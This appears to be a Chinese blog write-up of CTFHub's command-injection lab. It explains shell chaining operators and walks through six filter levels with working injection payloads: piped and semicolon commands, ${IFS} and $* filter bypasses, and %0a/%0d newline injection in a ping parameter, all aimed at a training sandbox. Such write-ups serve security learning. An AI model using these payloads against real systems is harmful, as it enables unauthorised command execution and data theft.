ctfhub 命令注入

于 2024-08-05 20:56:17 发布
阅读量214 收藏 8
点赞数 2
分类专栏: ctfhub 文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a666666688/article/details/140936846
版权

知识点

1.常见的拼接符

1、A ; B     先执行A,再执行B
2、A & B    简单的拼接
3、A | B      显示B的执行结果
4、A&&B    A执行成功之后才会执行B
5、A || B     A执行失败之后才会执行B
,           在特殊情况下可代替空格

2.常见的命令

(1)windows

1.type  显示文本文件内容
type x:\1.txt                      //显示x盘下的1.txt文件内容
type x:\1.txt | more            //分页显示x盘里1.txt的内容
more 1.txt                         //逐屏显示当目下1.txt的文本内容(空格:下一屏 q:退出)
2.dir  显示目录里的内容
dir                //显示当前目录里的子文件夹和文件
dir /b            //只显示当前目录子文件夹、文件的文件名
dir /p            //分页显示当前目录子文件夹、文件
dir /ad          //只显示当前目录中的文件夹
dir /a-d         //显示当目里的文件
dir x:/a         //显示x盘下a文件夹中的内容
dir 1.txt        //显示当目下1.txt的信息
dir /s            //递归显示当目中的内容   ctrl c终止当前命令
dir a*           //显示当目下a开头的文件、文件夹信息
dir /ah /os    //显示当目下隐藏的文件和目录,按文件大小从小到大排序

(2)Linux

1、ls:列出目录
2、pwd:显示当前所在的目录
3、cat:由第一行开始查看文件
4、tac:由最后一行到第一行查看
5、more:逐项查看文件,按空格继续,最后自己退出
6、less:逐行查看文件,按方向键,不可主动退出,按q退出
7、head:只查看文件前十行
8、tail:只查看文件后十行

一.无过滤

表单提交数据查询

127.0.0.1 | ls

127.0.0.1 | cat 13902158133348.php

查看页面源码

二.过滤cat

127.0.0.1 | ls

用head替换cat

127.0.0.1 | head flag_177602969423543.php

查看页面源码

三.过滤空格

127.0.0.1|ls

利用${IFS}绕过空格

127.0.0.1|cat${IFS}flag_30018569826895.php

查看页面源码

四.过滤目录分割符

127.0.0.1 | ls

因为过滤了分割符,所以flag_is_here文件夹下的文件不能直接读取

先进入文件夹

127.0.0.1;cd flag_is_here;ls

读取文件内容

127.0.0.1;cd flag_is_here;cat flag_31805149391734.php

查看页面源码

五.过滤运算符

代码分析

这段代码主要是处理通过 GET 方式传递的 ip 参数。
首先,定义了一个变量 $res 并初始化为 FALSE 。
然后,通过 isset($_GET['ip']) && $_GET['ip'] 检查是否存在 ip 参数并且该参数不为空。
如果存在且符合条件,将 ip 参数的值赋给变量 $ip ,并创建一个空数组 $m 。
接着,使用 preg_match_all 函数检查 $ip 中是否包含 | 或 & 。如果不包含,执行 $cmd = "ping -c 4 {$ip}" 构建一个 ping 命令的字符串,并使用 exec 函数执行该命令,将结果存储在 $res 中。
如果 $ip 中包含了 | 或 & ,则将匹配的结果存储在 $res 中。
;并没有被过滤

127.0.0.1;ls

;cat flag_15472583520602.php

查看页面源码

六.综合过滤

代码分析

这段代码的主要目的是根据用户通过 GET 方法提交的 ip 参数执行相应的操作。

首先,初始化 $resFALSE 。然后检查是否存在 ip 参数并且其不为空。如果存在有效的 ip 参数,会进行进一步的正则表达式匹配检查。

正则表达式 /(\||&|;| |\/|cat|flag|ctfhub)/ 用于检查 ip 参数中是否包含了 |&; 、 空格 、 /catflagctfhub 等特定字符。如果不包含这些字符,就构建一个 ping -c 4 {$ip} 的命令并使用 exec 函数执行,将结果存储在 $res 中。如果包含了这些被禁止的字符,就将匹配结果存储在 $res 中。

绕过思路

%0a 换行符
%0d 回车符
$* 在shell命令执行下为空
${IFS} 表示空格

列举目录

?ip=127.0.0.1%0als

注意本体在url上修改即可

http://challenge-0b522550916c7d0b.sandbox.ctfhub.com:10800/?ip=%0als#

若要在表单提交处修改则需要注意,提交后删除url中的25后即可执行

列举文件夹下的文件

http://challenge-0b522550916c7d0b.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0D%0Acd${IFS}fl$*ag_is_here%0Als#

查看文件内容获取flag

challenge-0b522550916c7d0b.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0D%0Acd${IFS}fl$*ag_is_here%0Ahead${IFS}fl$*ag_189242026830052.php#

查看页面源码

fasewer
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
命令注入讲解ppt.pptx
08-10
命令注入讲解 命令注入是一种高危漏洞,指攻击者能够控制外部的参数达到随意执行系统命令的结果。命令执行漏洞不仅存在于 B/S 架构中,也存在于 C/S 架构中。本次讨论的都是 Web 中的命令执行漏洞。 命令注入攻击...
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
CTFHub 命令注入-综合练习
qq_56096156的博客
03-21 918
1.因为运算符被过滤掉了,我们先用分号测试一下命令是否执行;2.接下来我们用cat命令查看flag文件。发现可以执行,并且找到了flag文件。然后右键查看网页源代码,找到hub.
CTFHub 命令注入-无过滤
m0_65766842的博客
03-01 215
1
CTFHub 命令注入-过滤运算符
qq_56096156的博客
03-22 189
1.因为运算符被过滤掉了,我们先用分号测试一下命令是否执行;2.接下来我们用cat命令查看flag文件。发现可以执行,并且找到了flag文件。然后右键查看网页源代码。
CTFHub 命令注入-过滤cat
At0m的博客
01-14 3250
CTFHub 命令注入-过滤cat 第一还是看源码,首先是肯定是过滤了cat关键字,虽然看不太懂,但是才也是这样啊嘻嘻。 但是preg_match_all有三个参数,看一下,这三个参数分别是干什么的: <?php $userinfo = "Name: <b>PHP</b> <br> Title: <b>Programming Language</b>"; preg_match_all ("/<b>(.*)<\/b>/
CTFHub | 命令注入
尼泊罗河伯的博客
06-14 1791
检查网页显示内容,可以直接看到源代码。大致意思是:检查用户输入的 GET 请求,判断用户是否输入了ip 信息。如果输入了 ip 信息,则使用用户输入的这个 ip 数据执行一个 shell 命令 "ping -c 4" 。
CTFhub命令注入—过滤空格
manerzi的博客
10-25 658
CTFhub命令注入—过滤空格
CTFHub RCE 命令注入
m0_75234353的博客
03-08 129
思路
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2072
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
ctfhub-命令注入
m0_62094846的博客
12-15 329
看到有Ping直接写127.0.0.1看看 可以成功,再输入命令 每个都试一次 两个文件都试过了,都没有flag 然后看看上一个文件夹 然后也一个个试了,也没用 后面的都是这样的 看wp,是在48892291724801.php里面 以后看到有点奇怪的要留心一些,可能包含了flag,然后它的回显也不一样,就是有数据出来的样子,但是没有数据,就看看源代码 ...
ctfhub web全部做题记录(持续跟新)
01-08
【SQL注入】SQL注入是Web应用中常见的安全漏洞,允许攻击者执行恶意SQL命令。分为整数型和字符型注入,以及报错注入。可以通过调整查询参数来获取数据库信息,甚至直接读取flag字段。 【文件上传漏洞】无验证的文件...
3.18号日报,ctfhub中web,文件上传漏洞题目解法
03-18
本文将基于标题“3.18号日报,ctfhub中web,文件上传漏洞题目解法”以及描述“文件上传漏洞”,详细介绍几种典型的文件上传漏洞利用方法及其技术细节。 #### 一、无验证直接上传一句话木马 这类题目是最简单的,...
CTF相关命令使用
01-21
- **技术**:利用发现的漏洞,如SQL注入命令注入等,来获取对系统的初始访问权限。 - **工具**:可以使用Metasploit、BeEF等工具来辅助攻击过程。 #### 六、从非特权Shell到特权Shell - **技术**:利用Linux提权...
linux磁盘可视化分析工具
最新发布
吻等离子的博客
08-02 1088
Baobab 是 GNOME 桌面环境中的一款图形化磁盘使用分析工具。它能够扫描文件系统并显示各个文件和目录的磁盘使用情况,以易于理解的树形图或圆环图展示。这种可视化方式使得用户能够快速找到占用空间较大的文件和目录。Baobab 是一款非常实用的磁盘使用可视化工具,特别适合用来分析和管理 Linux 系统中的磁盘空间。通过它的直观界面和强大的功能,用户可以轻松找到占用磁盘空间最多的文件和目录,从而采取相应的措施进行清理或优化。
LeetCode 572.另一棵树的子树 C写法
m0_63816268的博客
08-02 245
可以用上的方法,,如果有一轮比较成功就表示root包含subroot。
linux查询占用端口 杀死占用端口进程
ll回家了
08-02 279
在确定了占用端口的进程之后,您可以使用 `kill` 或 `pkill` 命令来终止这些进程。`lsof`(列出打开的文件)命令是另一个强大的工具,用于检查哪些进程在使用特定端口。您可以使用 `netstat` 和 `lsof` 命令来检查哪些进程在使用特定端口。- **`-n`**:以数字形式显示地址,避免DNS查找。- **`-p`**:显示进程的PID和程序名称。- `kill -9 `:强制终止进程。- **`-t`**:显示TCP端口。- **`-l`**:列出监听端口。
Linux地址空间详解
m0_74830524的博客
08-02 846
本篇通过对物理内存和页表详细的讲解,对 Linux 系统下的地址空间做了深度的剖析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值